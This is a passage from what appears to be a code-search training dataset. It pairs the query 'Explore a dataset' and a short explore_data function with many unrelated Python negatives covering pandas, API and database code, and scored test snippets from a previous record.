anger=.1)\n emotion.save()\n\n self.assertEqual(one_user.emotions.first().anger, .1)", "def setUp(self):\n fun = Category(name=\"funny\")\n fun.save()\n lagos = Location(name=\"Lagos\")\n lagos.save()\n self.new_image = Pics(\n name=\"image\", description=\"h\", location=lagos, category=fun)", "def test_activity_photos(self):\n activity = self.client.get_activity(152668627)\n self.assertTrue(activity.photo_count > 0)\n photos = list(activity.photos)\n self.assertEqual(len(photos), 1)\n self.assertEqual(len(photos), activity.photo_count)\n self.assertIsInstance(photos[0], model.ActivityPhoto)", "def create_fake_data():\n s = Story.objects.create(body=\"farfrompuken is so awesome, i just love it.\",\n author_name=\"jared nuzzolillo\")\n\n img_urls = (\"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-B.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-D.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/l-f.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-K.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/l-m.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-P.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-T.png\",)\n\n for i, img_url in enumerate(img_urls):\n StoryImage.objects.create(\n story=s,\n image=Image.objects.create(\n url=img_url,\n name=\"name %d\" % i,\n author_name=\"Johnny %d Times\" % i,\n author_url=\"http://somewherecool%d\" % i,\n uppercase=\"uppercase %d\" % i,\n typeface=\"typeface %d\" % i))", "def test_delete_image_by_wrong_tag(self, test_image):\n tag = f\"{TEST_IMAGE_NAME}:wrong_tag\"\n assert image_exists(TEST_IMAGE_NAME)\n assert not delete_image(tag, force=True)\n assert image_exists(TEST_IMAGE_NAME)\n\n # now delete using that tag, both tags will be gone because it's the same image.\n build_test_image(tag=tag)\n assert image_exists(TEST_IMAGE_NAME)\n assert image_exists(tag)\n assert delete_image(tag, force=True)\n assert not image_exists(TEST_IMAGE_NAME)\n assert not image_exists(tag)", "def copy_images(apps, schema_editor):\n\n FieldImage = apps.get_model('field_wagtail', 'FieldImage')\n Image = apps.get_model('wagtailimages', 'Image')\n django_content_type = apps.get_model('contenttypes', 'contenttype')\n tagged_item_model = apps.get_model('taggit', 'TaggedItem')\n\n images = Image.objects.all()\n new_images = []\n for image in images:\n new_images.append(FieldImage(\n id=image.id,\n title=image.title,\n file=image.file,\n width=image.width,\n height=image.height,\n created_at=image.created_at,\n focal_point_x=image.focal_point_x,\n focal_point_y=image.focal_point_y,\n focal_point_width=image.focal_point_width,\n focal_point_height=image.focal_point_height,\n file_size=image.file_size,\n collection=image.collection,\n uploaded_by_user=image.uploaded_by_user,\n alt_text=''\n ))\n\n FieldImage.objects.bulk_create(new_images)\n\n ct_extended_model, created = django_content_type.objects.get_or_create(\n app_label='field_wagtail',\n model='fieldimage'\n )\n ct_wagtail_model = django_content_type.objects.get(\n app_label='wagtailimages',\n model='image'\n )\n\n tagged_item_model.objects.filter(\n content_type_id=ct_wagtail_model.id).update(\n content_type_id=ct_extended_model.id\n )", "def test_aws_service_api_image_get(self):\n pass", "def test_image_obj_creado_con_exito(self):\n self.assertTrue(self.image_model.objects.get(pk=self.image_obj.pk))", "def test_deletion_of_user_photo_succeeds(self):\n\t\tself.name = 'media.png'\n\t\tself.image = File(open('static/img/media.png', 'rb'))\n\t\tself.created_image = UserPhoto(image=self.image, name=self.name, created_by=self.user)\n\t\tself.created_image.save()\t\t\t\n\t\tresponse = self.client.delete('/api/modify_photo/?id={}'.format(self.created_image.id))\n\t\tself.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)", "def test_retrieve_tags_assigned_unique(self):\n tag1 = Tag.objects.create(user = self.user,name='Breakfast')\n tag2 = Tag.objects.create(user=self.user,name='Lunch')\n\n recipe1 = Recipe.objects.create(user=self.user,title='Goose Liver on toast',price=5.00,time_minutes=15)\n recipe2 = Recipe.objects.create(user = self.user,title='Egg Benedict',price=5.00,time_minutes=15)\n recipe1.tags.add(tag1)\n recipe2.tags.add(tag1)\n\n res = self.client.get(TAGS_URL,{'assigned_only':1})\n self.assertEqual(len(res.data),1)", "def aug_test(self, imgs, img_metas, **kwargs):\n pass", "def aug_test(self, imgs, img_metas, **kwargs):\n pass", "def testimage_handler(self):\n\t\t\n\t\tthings = Thing.objects.all()\n\t\tif len( things ):\n\t\t\tthing = things[0]\n\t\telse:\n\t\t\tc = Client()\n\t\t\tdata = parse_qs( 'title=&tags=&lattitude=32.82248&longitude=-96.762986&duration=&parent=&privacy=U&lifespan=&format=txt' )\n\t\t\tdata[ 'media' ] = open( MEDIA_ROOT + 'unittest_image.jpg' )\n\t\t\tc.post( '/api/place/', data )\n\t\t\t\n\t\t\tthing = Thing.objects.all()[0]\n\n\t\t\n\t\turi = thing.media.replace( 'http://' + DOMAIN, '' )\n\t\t\n\t\tc = Client()\n\t\tresponse = c.get( uri )\n\t\tself.failUnlessEqual(response.status_code, 200)", "def test_record_emotions_post_adds_emotion_to_db(self):\n from emotion_emotions.views import RecordEmotions\n num = len(Emotion.objects.all())\n request = self.request.post('', data={'image': 'data:base64,FAKE'})\n request.user = self.dan\n view = RecordEmotions(request=request)\n view.post(request)\n new_num = len(Emotion.objects.all())\n self.assertEqual(num + 1, new_num)", "def fetch_photo_id_image(self):\r\n if settings.FEATURES.get('AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING'):\r\n return\r\n\r\n self.photo_id_key = self.original_verification(self.user).photo_id_key\r\n self.save()", "def forward_test(self, img, img_metas, **kwargs):", "def simple_test(self, img, img_meta, **kwargs):\n pass", "def test_answer_meta_image_uses_category_image_if_no_social_image(self):\n category = baker.make(Category, category_image=self.test_image)\n page = self.page1\n page.category.add(category)\n page.save_revision()\n self.assertEqual(page.meta_image, self.test_image)", "def test_get_image_id(self):\n img_id = str(uuid.uuid4())\n img_name = 'myfakeimage'\n self.my_image.id = img_id\n self.my_image.name = img_name\n self.sahara_client.images.get.return_value = self.my_image\n self.sahara_client.images.find.side_effect = [[self.my_image], []]\n\n self.assertEqual(img_id, self.sahara_plugin.get_image_id(img_id))\n self.assertEqual(img_id, self.sahara_plugin.get_image_id(img_name))\n self.assertRaises(exception.EntityNotFound,\n self.sahara_plugin.get_image_id, 'noimage')\n\n calls = [mock.call(name=img_name),\n mock.call(name='noimage')]\n self.sahara_client.images.get.assert_called_once_with(img_id)\n self.sahara_client.images.find.assert_has_calls(calls)", "def test_price_breakdown_by_id_image(self):\n pass", "def test_Image():\n assert Image(cur, \"Simple_Linear\").detect_image() == True\n assert Image(cur, \"Logistic_Linear\").detect_image() == False\n assert Image(cur, \"Simple_Linear\").date == \"2021-04-20\"\n assert Image(cur, \"Breslow-Day_Test\").source == \"Course BIOSTAT703 slide\"", "def test_create_recipe_with_tags(self):\n tag1 = sample_tag(user=self.user,name='vegan')\n tag2 = sample_tag(user=self.user, name='dessert')\n payload = {\n 'title':'cheesecake',\n 'tag':[tag1.id,tag2.id],\n 'time_minutes':60,\n 'price':10.00,\n }\n res = self.client.post(RECIPE_URL,payload)\n self.assertEqual(res.status_code,status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(id=res.data['id'])\n tags = recipe.tag.all()\n self.assertEqual(len(tags),2)\n self.assertIn(tag1,tags)\n self.assertIn(tag2,tags)", "def get_images_by_vulnerability(self, **kwargs):\n ..." ]
[ "0.66079843", "0.6477032", "0.6326245", "0.6268388", "0.6267517", "0.6212116", "0.6183669", "0.61595887", "0.6151405", "0.61384684", "0.60875714", "0.60794526", "0.6066342", "0.60580915", "0.6017938", "0.60149026", "0.600587", "0.6003988", "0.5976658", "0.59595704", "0.5959389", "0.5944568", "0.5924291", "0.59211135", "0.589627", "0.5887148", "0.5880393", "0.58649886", "0.5861153", "0.5850407", "0.5849973", "0.58262974", "0.58257467", "0.58053976", "0.5800949", "0.5773536", "0.5770676", "0.57614267", "0.57304215", "0.57161194", "0.5712388", "0.57110626", "0.56890166", "0.56807595", "0.5666246", "0.5664621", "0.5661664", "0.5655272", "0.5654474", "0.5653362", "0.5652592", "0.5636366", "0.5632572", "0.5630062", "0.56242555", "0.5621509", "0.56148183", "0.5608346", "0.5607644", "0.5586847", "0.55742043", "0.5573187", "0.5560907", "0.554996", "0.55474967", "0.55376804", "0.5520847", "0.55140877", "0.5509492", "0.55073214", "0.5492122", "0.5487059", "0.54864615", "0.54864377", "0.5484148", "0.5479218", "0.54647034", "0.5459926", "0.5452578", "0.5435263", "0.54266876", "0.54238445", "0.5417995", "0.5416855", "0.54159874", "0.5414571", "0.54141396", "0.5411324", "0.5411324", "0.54096735", "0.54073346", "0.5403596", "0.53911453", "0.5390099", "0.5376477", "0.5375408", "0.5370571", "0.5363878", "0.5361499", "0.536111" ]
0.56813097
43
Method to be implemented
def update_with_fit_args(self, **kwargs): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __call__(self):\n raise NotImplementedError", "def support(self):", "def __call__(self):\n raise NotImplementedError()", "def __call__(self):\r\n raise NotImplementedError('override me')", "def __call__(self):\n\t\treturn", "def __call__(self) -> None:", "def __call__( self ):\n pass", "def __call__(self):\n pass", "def __call__(self):\n pass", "def implement(self):\n\t#@DEBUG remove comments", "def use(self):", "def function(self):\n raise NotImplementedError", "def regular(self):", "def override(self):\n return None", "def degibber(self):", "def test(self):\n raise NotImplementedError", "def intuit(self):\n raise NotImplemented()", "def __call__(self, *args, **kwargs):\r\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\r\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\r\n raise NotImplementedError", "def __init__(self):\n raise NotImplementedError", "def __init__(self):\n raise NotImplementedError", "def __init__(self):\n raise NotImplementedError", "def __init__(self):\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\n raise NotImplementedError", "def think(self):\n pass", "def __call__(self, **kwargs):\n raise NotImplementedError", "def basic(self):\n pass", "def logic(self):\r\n raise NotImplementedError", "def moi(self):\n\n pass", "def _proceed(self):\n raise NotImplementedError", "def method(self):", "def handle(self):", "def apply(self) -> None:", "def apply(self) -> None:", "def __int__(self):\n pass", "def process(self):", "def process(self):", "def process(self):", "def __init__(self):\n raise NotImplementedError()", "def d(self):\n pass", "def d(self):\n pass", "def _hook(self):", "def CL(self):", "def _create_impl(self):", "def apply(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def initialize(self):", "def initialize(self):", "def initialize(self):", "def initialize(self):", "def init(self):", "def init(self):", "def processing(self):\n pass", "def offering(self):\r\n raise NotImplementedError()", "def _prepare(self):", "def _prepare(self):", "def present(self):", "def __call__(self) -> dict:\n\t\tpass", "def call(self):", "def _build_impl(self):", "def _init(self):\n raise NotImplementedError", "def run(self):\n raise NotImplementedError # implement in subclass", "def target(self):", "def bad(self):\n raise NotImplementedError", "def bad(self):\n raise NotImplementedError", "def check(self):\n raise NotImplementedError", "def _run(self):\n raise NotImplementedError", "def _run(self):\n raise NotImplementedError", "def __init__(self):\r\n\t\tpass", "def base(self):\n raise NotImplementedError()", "def initialise(self):", "def __call__():", "def __call__():", "def __call__():", "def __call__():", "def __call__():", "def extension (self):\n assert False, \"To be implemented by child\"", "def perform(self):\n pass", "def _init(self):", "def mezclar_bolsa(self):", "def __init__(self):\n raise NotImplementedError(\"This class cannot be instantiated!\")", "def result(self):", "def result(self):", "def run(self): \r\n return", "def __init__():", "def perform(self):\n raise NotImplementedError", "def __init__ (self) :", "def __call__(self):", "def __call__(self):", "def apply(self): # pragma: no cover\n raise NotImplementedError" ]
[ "0.78358424", "0.7723889", "0.7493241", "0.7416625", "0.7341111", "0.7135667", "0.7118768", "0.71088976", "0.71088976", "0.70884323", "0.69750255", "0.68996793", "0.6808303", "0.6796849", "0.6753698", "0.67092526", "0.66899514", "0.6654799", "0.6654799", "0.6654799", "0.6641924", "0.6641924", "0.6641924", "0.6641924", "0.6596571", "0.6596571", "0.6588812", "0.6571001", "0.6568187", "0.65485066", "0.6520751", "0.65138245", "0.6494921", "0.64902943", "0.6467395", "0.6467395", "0.6465909", "0.6441366", "0.6441366", "0.6441366", "0.6424249", "0.6420371", "0.6420371", "0.64175504", "0.6413171", "0.64078313", "0.64028096", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6385707", "0.6385707", "0.6385707", "0.6385707", "0.6385517", "0.6385517", "0.63816535", "0.6370596", "0.63703585", "0.63703585", "0.6363289", "0.6358765", "0.63450044", "0.6337269", "0.63343555", "0.63336754", "0.6328508", "0.6327035", "0.6327035", "0.6318311", "0.6309866", "0.6309866", "0.63090646", "0.6301731", "0.63002306", "0.62871397", "0.62871397", "0.62871397", "0.62871397", "0.62871397", "0.62790257", "0.6277439", "0.627327", "0.6270304", "0.62677425", "0.626764", "0.626764", "0.6250167", "0.6249451", "0.6246711", "0.62440634", "0.6239104", "0.6239104", "0.6233122" ]
0.0
-1
Explore a dataset dataset pandas dataset prj_info dictionnary containing projet information (response...)
def explore_data(data,prj_info,TMP=1234): print(" Data file rows and columns are : ", data.shape) #Open pdf pp = PdfPages(prj_info['OUTPUT_PATH'] + "exploration_" + str(TMP) + ".pdf") #Plot average plot_average_reponse(data,prj_info,pp,TMP) #Close pdf pp.close() return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def extract_project_details(\n df,\n copy_columns=info_columns,\n column_rename_dict=info_column_rename_dict,\n use_record=0,\n record_index=\"PID_Index\",\n):\n df_details = df.copy().loc[df[record_index] == use_record][copy_columns]\n\n if column_rename_dict:\n df_details = df_details.copy().rename(columns=column_rename_dict)\n\n return df_details.set_index(\"PID\")", "def personnel_projects_table(personnel_search_table_selected_indices, selected_funding, selected_year, rows):\n personnel_outcome_data, personnel_name = personnel_outcomes_helper(personnel_search_table_selected_indices, selected_funding, selected_year, rows)\n if personnel_outcome_data is not None:\n personnel_outcome_data = personnel_outcome_data[[\"type\", \"pub_title\"]]\n return personnel_outcome_data.to_dict('records')\n\n return pd.DataFrame(data=None, columns=[\"type\", \"pub_title\"]).to_dict('records') # None cannot be passed back as it will cause an error.", "def _createDataFromProject(self):\n data = []\n project_dict = self._project.asDict()\n for phase_id, phase_dict in project_dict['phases'].items():\n for fitable_id, fitable_dict in phase_dict['cell'].items():\n data.append({\n 'id': ['phases', phase_id, 'cell', fitable_id],\n 'label': '{} {}'.format(phase_id, fitable_id),\n 'value': fitable_dict['value'],\n 'error': fitable_dict['error'],\n 'refine': fitable_dict['refine']\n })\n return data", "def getProjectData(self) -> ghidra.framework.model.ProjectData:\n ...", "def getIndicePreciosInternosAlPorMayorBase2015(self):\n #Obtener la url de descarga del cvs\n urlPackage=\"https://datos.gob.ar/api/3/action/package_show?id=sspm-indice-precios-internos-basicos-al-por-mayor-dic-2015-100\"\n s=requests.get(urlPackage).content\n objJson = json.loads(s)\n resultado = objJson['result']['resources']\n selector = 0\n ultimoResultado = resultado[selector]\n urlDescarga = ultimoResultado['url']\n descripcion = ultimoResultado['description']\n print(\"Descargando: {}\".format(descripcion))\n print(\"Archivo: {}\".format(urlDescarga))\n \n #Descargar la url con cvs y generar pandas dataframe\n contenidoCVS = requests.get(urlDescarga).content\n flujoCVS = io.StringIO(contenidoCVS.decode('utf-8'))\n df_temp = pd.read_csv(flujoCVS)\n \n #transform string to datetime\n df_temp['indice_tiempo'] = pd.to_datetime(df_temp['indice_tiempo'], format='%Y-%m-%d', errors='ignore')\n df_temp['indice_tiempo'] = df_temp['indice_tiempo'].dt.date\n #set index\n df_temp.set_index('indice_tiempo', inplace=True)\n \n return df_temp", "def get_reanalysis_projects_by_accession(self, accession):\n request_url = self.api_base_url + \"projects/reanalysis/\" + accession\n headers = {\"Accept\": \"application/JSON\"}\n response = Util.get_api_call(request_url, headers)\n return response.json()", "def getCitationsData():\n # Follows https://github.com/simonw/irma-scrapers/issues/1\n citationsResponse = requests.get(\"https://api.github.com/repos/greenelab/covid19-review/git/trees/output\", headers=headers).json()\n treeEntry = [t for t in citationsResponse[\"tree\"] if t[\"path\"] == \"references.json\"][0] \n citations = json.loads(base64.b64decode(requests.get(treeEntry[\"url\"]).json()[\"content\"]))\n\n citationsDF = pd.DataFrame(citations)\n citationsDF[\"Covid19-review_paperLink\"] = citationsDF.id.apply(lambda x: \"https://greenelab.github.io/covid19-review/#ref-\" + x)\n citationsDF = citationsDF[[\"DOI\", \"title\", \"issued\", \"container-title\", \"URL\", \"Covid19-review_paperLink\"]]\n citationsDF.rename(columns={\"DOI\": \"doi\", \"issued\": \"date\", \"container-title\": \"publication\"}, inplace=True)\n\n # Convert date to string\n def dateStringFromDateParts(row):\n try:\n dateParts = row['date']['date-parts'][0]\n if len(dateParts) == 3:\n return \"-\".join([str(dateParts[1]), str(dateParts[2]), str(dateParts[0])])\n elif len(dateParts) == 2:\n return \"-\".join([str(dateParts[1]), str(dateParts[0])])\n elif len(dateParts) == 1:\n return str(dateParts[0])\n else:\n return\n except:\n return\n\n citationsDF.date = citationsDF.apply(dateStringFromDateParts, axis=1)\n\n citationsDF.set_index(\"doi\", inplace=True)\n return citationsDF", "def extract_details( session_requests, job_id ):\n \n url_prefix = CONFIG[\"url_prefix\"]\n \n #Extract html from web\n url = CONFIG[\"url_jobno\"] + str(job_id)\n tree = scrape_html(session_requests, url)\n \n #Extact description\n title = \"; \".join(tree.xpath(\"//p[@class='listheader']/text()\"))\n description = \"; \".join(tree.xpath(\"//p//text()\")) #more than one element\n \n #Extract files\n num_file = int(tree.xpath(\"count(//p[contains(text(),'Job Description Document :')]//a)\"))\n loop_range = min(num_file, (MAX_NUM_OF_FILES - 1))\n \n file_link = [\"NA\"] * MAX_NUM_OF_FILES\n file_name = [\"NA\"] * MAX_NUM_OF_FILES\n down_file_name = [\"NA\"] * MAX_NUM_OF_FILES\n \n if (num_file > (MAX_NUM_OF_FILES - 1)):\n file_link[(MAX_NUM_OF_FILES - 1)] = \"More than 9 files\"\n file_name[(MAX_NUM_OF_FILES - 1)] = \"More than 9 files\"\n \n for i in range(loop_range):\n file_link[i] = url_prefix + tree.xpath(\"//p[contains(text(),'Job Description Document :')]//a/@href\")[i]\n file_name[i] = tree.xpath(\"//p[contains(text(),'Job Description Document :')]//a/text()\")[i]\n \n ext = find_file_extention(file_name[i])\n down_file_name[i] = download_file(session_requests, file_link[i], job_id, i, ext)\n \n # dataframe\n row_names_link = init_file_dataframe()[1]\n row_names_name = init_file_dataframe()[2]\n row_names_down = init_file_dataframe()[3]\n \n df_link = np.transpose(pd.DataFrame(file_link, row_names_link))\n df_name = np.transpose(pd.DataFrame(file_name, row_names_name))\n df_down = np.transpose(pd.DataFrame(down_file_name, row_names_down))\n \n df_file = pd.DataFrame(data = {\"job_title\": [title], \"description\": [description], \"num_of_file\": [loop_range]})\n df_file = pd.concat([df_file.reset_index(drop=True), df_link], axis=1, sort=False)\n df_file = pd.concat([df_file.reset_index(drop=True), df_name], axis=1, sort=False)\n df_file = pd.concat([df_file.reset_index(drop=True), df_down], axis=1, sort=False)\n \n return df_file", "def get_data(self, **kwargs):\n\n self.data = {}\n #node_data = ''\n #link_data = ''\n templates_data = self.request_from_server('templates')\n self.templates = templates_data\n project_data = self.request_from_server('projects')\n for project in project_data:\n project_name = project['name']\n if 'project_name' in kwargs:\n if project_name != kwargs['project_name']:\n continue\n\n self.data[project_name] = {}\n self.data[project_name]['project_id'] = project['project_id']\n self.data[project_name]['nodes'] = {}\n node_data = self.request_from_server('projects/{}/nodes'.format(project['project_id']))\n link_data = self.request_from_server('projects/{}/links'.format(project['project_id']))\n for node in node_data:\n node_name = node['name']\n self.data[project_name]['nodes'][node_name] = {}\n self.data[project_name]['nodes'][node_name]['node_id'] = node['node_id']\n self.data[project_name]['nodes'][node_name]['template_id'] = node['template_id']\n self.data[project_name]['nodes'][node_name]['node_type'] = node['node_type']\n self.data[project_name]['nodes'][node_name]['console_port'] = node['console']\n self.data[project_name]['nodes'][node_name]['console_session'] = None\n self.data[project_name]['nodes'][node_name]['x'] = node['x']\n self.data[project_name]['nodes'][node_name]['y'] = node['y']\n self.data[project_name]['nodes'][node_name]['ports'] = {}\n if project['status'] != 'closed':\n self.data[project_name]['nodes'][node_name]['status'] = node['status']\n for port in node['ports']:\n port_name = port['short_name']\n self.data[project_name]['nodes'][node_name]['ports'][port_name] = {}\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['adapter_number'] = port['adapter_number']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['port_number'] = port['port_number']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['link_type'] = port['link_type']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['link_id'] = None\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['in_use'] = False\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to'] = None\n for link in link_data:\n for link_node in link['nodes']:\n if node['node_id'] == link_node['node_id']:\n if link_node['label']['text'] == port_name:\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['link_id'] = link['link_id']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['in_use'] = True\n if link['nodes'].index(link_node) == 0:\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to_id'] = link['nodes'][1]['node_id']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to'] = self.get_node_name_from_id(project_name,link['nodes'][1]['node_id'])\n else:\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to_id'] = link['nodes'][0]['node_id']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to'] = self.get_node_name_from_id(project_name,link['nodes'][0]['node_id'])", "def _parse_project_params(self, response_tree, data):\n # if self.project == 'TWC':\n # data['lithium'] = response_tree.find('lithiumresults').text\n\n if self.project == 'ILAR':\n data['ilar_title'] = response_tree.find('ilartitle').text\n data['ilar_rank'] = int(response_tree.find('ilarrank').text)\n\n if response_tree.find('ilarresponse').text is None:\n data['ilar_response'] = None\n else:\n data['ilar_response'] = response_tree.find(\n 'ilarresponse').text.encode('ascii', 'ignore')", "def fetch_data(self) -> pd.DataFrame:\r\n os.chdir(r'\\\\192.168.8.90\\投研部\\Jessica\\test_data')\r\n if self.tic in ['RB.CCRI', 'HC.CCRI', 'I.CCRI', 'J.CCRI', 'JM.CCRI', 'ZC.CCRI']:\r\n f = pd.read_hdf('data.h5', 'snc')\r\n if self.tic in ['CU.CCRI', 'ZN.CCRI', 'AL.CCRI', 'NI.CCRI']:\r\n f = pd.read_hdf('data.h5', 'met')\r\n data = f.loc[f.loc[:, 'sec_code'] == self.tic, :]\r\n # extract I.CCRI data\r\n table = pd.pivot_table(data, index=['date'], columns=['factor_code'], values='factor_value')\r\n table = table.sort_values(by='date')\r\n \r\n return table", "def yaml_parser_preprocess_pipeline_input_parameter_get_description_df(config):\n df= pandas.DataFrame.from_dict(config['query_system']['profile_description'], orient = 'index')\n df['query_protein_name'] = df.index\n return df", "def extract_data():\n raw_data = pd.read_csv(\"../../../resource/DataVisualization/vaccinations.csv\")\n raw_data = raw_data[[\"location\", \"date\", \"people_fully_vaccinated_per_hundred\"]]\n raw_data.date = pd.to_datetime(raw_data.date, format=\"%Y-%m-%d\")\n min_date = raw_data.date.min()\n raw_data.date = raw_data.date-min_date\n raw_data.date = pd.Series([x.days for x in raw_data.date])\n raw_data.drop(raw_data.loc[raw_data.people_fully_vaccinated_per_hundred.isnull()].index,\n axis=0, inplace=True)\n raw_data[\"people_fully_vaccinated_per_hundred\"] /= 100\n\n data_dict = dict()\n for country in raw_data.location.unique():\n if len(raw_data.loc[raw_data.location == country]) >= 100:\n tmp_data = raw_data.loc[raw_data.location == country]\n tmp_data.drop(\"location\", axis=1, inplace=True)\n data_dict[country] = {\"data\":tmp_data}\n else:\n raw_data.drop(raw_data.loc[raw_data.location ==\n country].index, inplace=True)\n return data_dict, min_date, raw_data", "def _createDataFromProject(self):\n project_dict = self._project.asDict()\n data_blocks = {}\n headers_blocks = {}\n for experiment_id, experiment_dict in project_dict['experiments'].items():\n data = []\n headers = []\n for data_id, data_list in experiment_dict['calculated'].items():\n headers.append(data_id)\n data.append(data_list)\n headers_blocks[experiment_id] = headers\n data_transposed = [*zip(*data)]\n data_blocks[experiment_id] = data_transposed\n return headers_blocks, data_blocks", "def _createDataFromProject(self, project):\n data = []\n headers = []\n project_dict = project.asDict()\n for experiment_id, experiment_dict in project_dict['experiments'].items():\n for data_id, data_list in experiment_dict['measured'].items():\n headers.append(data_id)\n data.append(data_list)\n data_transposed = [*zip(*data)]\n return headers, data_transposed", "def lifedata_hpi():\n\n # A constant that defines the record fields that we wish to retrieve.\n FIELDS = {\n '_id': False, 'Country': True, 'CountryCode': True, 'Life Expectancy': True, 'Well-being(0-10)': True, 'Happy Life Years': True, 'Happy Planet Index': True,\n 'Population': True, 'GDP/capita': True, 'Governance Rank(1 - highest gov.)': True\n }\n\n # Open a connection to MongoDB using a with statement such that the\n # connection will be closed as soon as we exit the with statement\n with MongoClient(MONGODB_HOST, MONGODB_PORT) as conn:\n # Define which collection we wish to access\n collection = conn[DBS_NAME][COLLECTION_NAME]\n # Retrieve a result set only with the fields defined in FIELDS\n # and limit the the results to 55000\n projects = collection.find(projection=FIELDS, limit=55000)\n # Convert projects to a list in a JSON object and return the JSON data\n return json.dumps(list(projects))", "def xnat_workflow_info_show(args):\n\trequest_url = \"http://\" + args.server + \"/data/services/workflows/workflowid/\" + args.workflow_id + \"?format=json\"\n\tprint(\"xnat_workflow_info show: request_url: \" + request_url)\n\tresponse = requests.get(request_url, auth=(args.username, args.password))\n\tif (response.status_code != 200):\n\t\tprint(\"Cannot get response from request: \" + request_url)\n\t\tsys.exit(1)\n\n\tjson_response = json.loads(response.text)\n\tjson_items = json_response['items']\n\ti = 0\n\tfor json_item in json_items:\n\t\ti = i + 1\n\t\tprint i\n\n\t\t# meta\n\t\tjson_meta = json_item['meta']\n\t\tisHistory = json_meta['isHistory']\n\t\ttype = json_meta['xsi:type']\n\t\tstart_date = json_meta['start_date']\n\n\t\tprint \" isHistory: \" + str(isHistory)\n\t\tprint \" type: \" + type\n\t\tprint \" start_date: \" + start_date\n\t\n\t\t# children\n\t\t#json_children = json_item['children']\n\t\t#print \" children\"\n\t\t#print json_children\n\n\t\t# data_fields\n\t\tjson_data_fields = json_item['data_fields']\n\t\tstatus = json_data_fields['status']\n\t\tworkflow_id = json_data_fields['wrk_workflowData_id']\n\t\tdata_type = json_data_fields['data_type']\n\t\tlaunch_time = json_data_fields['launch_time']\n\t\tExternalID = json_data_fields['ExternalID']\n\t\tpipeline_name = json_data_fields['pipeline_name']\n\t\tID = json_data_fields['ID']\n\t\n\t\tprint \" status: \" + status\n\t\tprint \" workflow_id: \" + str(workflow_id)\n\t\tprint \" data_type: \" + data_type\n\t\tprint \" launch_time: \" + launch_time\n\t\tprint \" ExternalID: \" + ExternalID\n\t\tprint \" pipeline_name: \" + pipeline_name\n\t\tprint \" ID: \" + ID\n\n\t\tprint \" All Data Fields:\"\n\t\tprint \" \" + str(json_data_fields)", "def _get_data(self):\n project_name, experiment_id = self.parent._get_parent_identifiers()\n\n self._data = self.repository.get_dataframe_data(\n project_name, self.id, experiment_id=experiment_id\n )", "def get_details(i, df):\n print(\"Name:\", df.name.loc[i])\n print(\"Gender:\", df.gender.loc[i])\n print(\"Age in months:\", df.age.loc[i])\n print(\"Breed:\", df.breed1_desc.loc[i].title().replace(\"_\",\" \"),df.breed2_desc.loc[i].title().replace(\"_\",\" \"))\n print(\"Color/s:\", df.color1_desc.loc[i].title(), df.color2_desc.loc[i].title(), df.color3_desc.loc[i].title())\n print(\"Fur Length:\", df.fur_length.loc[i])\n print(\"Vaccinated:\", df.vaccinated.loc[i])\n print(\"Dewormed:\", df.dewormed.loc[i])\n print(\"Spayed or Neutered:\", df.sterilized.loc[i])\n print(\"Health:\", df.health.loc[i])\n print(\"No. of Pets in this Listing:\", df.quantity.loc[i])\n if df.fee.loc[i] == 0:\n print(\"Adoption Fee: FREE\")\n else:\n print(\"Adoption Fee: MYR\", round(df.fee.loc[i],2))\n print(\"Location :\", df.state_desc.loc[i].title().replace(\"_\",\" \"))\n print(\"Description :\", df.description.loc[i])\n print_images(i, df)", "def main():\n\n # Instantiate the class\n my_data = DataProject(TRAIN_URL, TEST_URL, HEADER_URL)\n\n # Check which columns contain missing data\n print(my_data.get_na_cols('train_df'))\n\n # We see 'workclass', 'occupation', 'native-country' all have missing\n # values. However, these are all categorical columns. Let's try\n # seeing what we can from the numerical columns\n print(my_data.train_df.describe())\n\n \"\"\"see:\n age goes from 17-90, but doesn't look too surprising.\n fnlwgt is a weight that is given to each line to show how representative\n of the full population it is (at least, how representative of the\n state it was drawn from??).\n education-num is actually a classification of different categories of\n education, and maps one-to-one with that column. I will drop this next\n capital-gain and capital-loss -- these seem reasonable, but are highly\n skewed to the right (up to the 75% is 0). So let's take a look at that\n distribution to see what it looks like\n hours-per-week shows nothing too extrodinary, except that the max is\n 99 hours a week! If this person is doing this weekly, although it is\n do-able, this is incredible!\n \"\"\"\n \n # as we noted in our observation, education-num is just a numbering\n # of the education factors. So, remove, since it doesn't give any extra\n # information\n my_data.train_df.drop('education-num', axis=1, inplace=True)\n my_data.test_df.drop('education-num', axis=1, inplace=True)\n\n # Now, let's see if we can spot anything if we visualize the data.\n # Note, the scatter_matrix method grabs all numerical columns and shows\n # a nice grid of plots to make it easy to see the distribution of the\n # values in these columns, and any correlations that might exist between\n # columns.\n #\n # 